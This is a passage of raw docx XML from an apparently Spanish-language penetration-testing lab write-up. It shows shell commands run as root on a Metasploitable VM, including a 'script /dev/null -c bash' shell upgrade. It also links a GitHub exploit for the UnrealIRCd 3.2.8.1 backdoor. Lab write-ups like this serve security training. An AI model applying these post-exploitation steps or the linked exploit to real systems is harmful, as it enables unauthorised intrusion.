      </w:r>
    </w:p>
    <w:p w14:paraId="326C37E6" w14:textId="08D57094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regresar en las carpetas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A4D446" w14:textId="078C2340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cd msfadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407DF55B" w14:textId="221F90E5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luego:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0157AE5A" w14:textId="734F08C8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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342EDDF7" w14:textId="23DCA277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Ahora podemos mejorar la visualización de la consola :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7A7AED" w14:textId="023832D8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 w:rsidRPr="00435663">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>script /dev/null -c bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35674CD8" w14:textId="77777777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</w:p>
    <w:p w14:paraId="12103A49" w14:textId="182FE902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Ahora vemos la consola mejor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1270368C" w14:textId="193589A6" w:rsidR="00435663" w:rsidRDefault="00435663" w:rsidP="00EC4E23">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00435663">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>root@metasploitable:/home/msfadmin#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AFD819" w14:textId="77777777" w:rsidR="00D36BF3" w:rsidRDefault="00D36BF3" w:rsidP="00EC4E23">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AA0FE51" w14:textId="4FDA6B86" w:rsidR="00D36BF3" w:rsidRDefault="00D36BF3" w:rsidP="00EC4E2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Podemos crear un archivo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243E1E17" w14:textId="3AC341AD" w:rsidR="00D36BF3" w:rsidRDefault="00D36BF3" w:rsidP="00EC4E23">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D36BF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>root@metasploitable:/home/msfadmin# touch prueba.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46816F68" w14:textId="77777777" w:rsidR="00EC4E23" w:rsidRPr="00EC4E23" w:rsidRDefault="00EC4E23" w:rsidP="00EC4E23">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BB6C80B" w14:textId="77777777" w:rsidR="00EC4E23" w:rsidRDefault="00EC4E23" w:rsidP="008B432B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F8A3BC5" w14:textId="3049B496" w:rsidR="00243DAC" w:rsidRDefault="00243DAC" w:rsidP="008B43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0DE3A7C" w14:textId="229AD488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 xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB15613" w14:textId="77777777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</w:p>
    <w:p w14:paraId="58648855" w14:textId="77777777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</w:p>
    <w:p w14:paraId="2E90EC62" w14:textId="31A7ACC5" w:rsidR="008B432B" w:rsidRDefault="008B432B" w:rsidP="008B432B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B432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8B432B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6253F163" w14:textId="77777777" w:rsidR="00F00D10" w:rsidRDefault="00F00D10" w:rsidP="00B90E33">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57ADB596" w14:textId="77777777" w:rsidR="00D17AB1" w:rsidRDefault="00D17AB1" w:rsidP="00B90E33">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00A08427" w14:textId="77777777" w:rsidR="00BB23FA" w:rsidRPr="00B90E33" w:rsidRDefault="00BB23FA" w:rsidP="00B90E33">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BE1A378" w14:textId="77777777" w:rsidR="00B90E33" w:rsidRPr="00B90E33" w:rsidRDefault="00B90E33" w:rsidP="00B90E33">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41A9813A" w14:textId="77777777" w:rsidR="00B90E33" w:rsidRPr="003C589D" w:rsidRDefault="00B90E33" w:rsidP="00335773">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E126501" w14:textId="77777777" w:rsidR="003C589D" w:rsidRDefault="003C589D" w:rsidP="003C589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9FB9CD" w14:textId="77777777" w:rsidR="003C589D" w:rsidRPr="003C589D" w:rsidRDefault="003C589D" w:rsidP="003C589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3073B67" w14:textId="7E0D1CE8" w:rsidR="003C589D" w:rsidRPr="003C589D" w:rsidRDefault="003C589D" w:rsidP="003C589D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C589D" w:rsidRPr="003C5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9D"/>
    <w:rsid w:val="00090441"/>
    <w:rsid w:val="00243DAC"/>
    <w:rsid w:val="00335773"/>
    <w:rsid w:val="003C589D"/>
    <w:rsid w:val="00435663"/>
    <w:rsid w:val="006A4D93"/>
    <w:rsid w:val="008B432B"/>
    <w:rsid w:val="00AF4919"/>
    <w:rsid w:val="00B90E33"/>
    <w:rsid w:val="00BB23FA"/>
    <w:rsid w:val="00D17AB1"/>
    <w:rsid w:val="00D36BF3"/>
    <w:rsid w:val="00EC4E23"/>
    <w:rsid w:val="00F0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0D34"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{24DB2313-0687-48B8-829B-103F8F78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7A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nger11Danger/UnrealIRCd-3.2.8.1-Backdoor.git" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdo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2024-07-20T14:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-20T16:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>